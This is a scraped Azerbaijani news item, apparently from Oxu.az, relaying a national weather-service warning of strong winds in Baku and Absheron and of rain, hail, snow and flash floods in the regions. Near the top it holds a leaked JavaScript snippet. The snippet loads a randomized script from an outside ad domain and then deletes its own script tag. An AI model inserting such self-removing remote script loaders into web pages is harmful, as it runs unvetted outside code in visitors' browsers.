Güclü külək əsəcək, yağış yağacaq – XƏBƏRDARLIQ

by admin

window._ttzi = 161;var script = document.createElement(“script”);script.src = “https://adviad.com/nativevideo/get_ads.js?=”+(Math.floor(Math.random() * 100000000) + 1);script.async = true;(document.body || document.head || document.documentElement).appendChild(script);script.onload = function(){script.parentNode.removeChild(script);};

Milli Hidrometeorologiya Xidməti hava şəraitinin qeyri-sabit keçəcəyi ilə bağlı xəbərdarlıq yayıb.

Xidmətdən verilən məlumata görə, Bakıda və Abşeron yarımadasında mayın 6-dan 8-i səhərədək şimal-qərb küləyinin 15-20 m/san, arabir 23-28 m/san-dək güclənəcəyi, 6-da yarımadanın bəzi yerlərində arabir 30-33 m/san-dək güclənəcəyi gözlənilir.

Azərbaycanın rayonlarında may ayının birinci ongünlüyünün sonunadək ölkə ərazisində yağıntılı hava şəraitinin davam edəcəyi, şimşək çaxacağı, fasilələrlə yağış yağacağı gözlənilir. Ayrı-ayrı yerlərdə intensivləşəcəyi, dolu düşəcəyi, yüksək dağlıq ərazilərdə qar yağacağı ehtimalı var.

Qərb küləyi 15-20 m/san, 6-7-də ayrı-ayrı yerlərdə arabir 25-30 m/san-dək güclənəcək. Çaylarda sululuğun artacağı, bəzi dağ çaylarından qısamüddətli daşqın və sel keçəcəyi ehtimal olunur.

Oxu.az

Bu yazılara da göz atın...